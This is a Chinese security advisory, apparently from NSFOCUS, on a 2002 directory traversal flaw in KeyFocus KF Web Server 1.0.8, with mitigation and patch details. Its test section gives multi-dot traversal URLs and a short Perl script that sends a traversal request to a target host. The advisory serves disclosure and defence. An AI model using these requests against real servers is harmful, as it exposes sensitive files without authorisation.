首页 -> 安全研究

安全研究

安全漏洞
KeyFocus KF Web Server远程目录遍历漏洞

发布日期:2002-11-13
更新日期:2002-11-20

受影响系统:
Key Focus KF Web Server 1.0.8
不受影响系统:
Key Focus KF Web Server 2.0.0 beta
描述:
BUGTRAQ  ID: 6180

KeyFocus Web服务程序是一款多功能的HTTP服务程序,支持多种日志格式,目录索引,预定义MIME设置,URL检查等功能。

KeyFocus Web服务程序不正确处理文件名包含'.'字符的请求,远程攻击者可以利用这个漏洞进行目录遍历攻击。

攻击者提交多个'.'字符的WEB请求,可导致脱离WEB ROOT目录,而以WEB进程的权限遍历系统目录,查看任意可查看的敏感文件内容。

<*来源:mattmurphy (mattmurphy@kc.rr.com
  
  链接:http://marc.theaimsgroup.com/?l=bugtraq&m=103723695020634&w=2
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

mattmurphy (mattmurphy@kc.rr.com)提供了如下测试方法:

http://kfws/.           - Current Directory
http://kfws/..          - 403 Forbidden
http://kfws/...         - KFWS install dir (OOPS!)
http://kfws/....        - Program Files
http://kfws/.....       -

#!/usr/bin/perl
use URI::Escape;
use IO::Socket;
if (@ARGV < 2) {
print STDOUT "Usage: perl $0 [filename] [host] [port]";
} else {
$f =
IO::Socket::INET->new(PeerAddr=>$ARGV[1],PeerPort=>$ARGV[2],Proto=>"tcp");
$url = uri_escape($ARGV[0]);
$exploit = sprintf("GET /.............../%s HTTP/1.0\r\n\r\n");
print $f $exploit;
undef $f;
}

建议:
临时解决方法:

如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:

* 设置只有部分MIME类型文件可被访问,最大限度防止此漏洞的破坏。

厂商补丁:

Key Focus
---------
KFWS v2.0.0(Beta)已经修正了这个漏洞,下一个Stable版本也修正了这个漏洞:

http://www.keyfocus.net/kfws/

浏览次数:2874
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障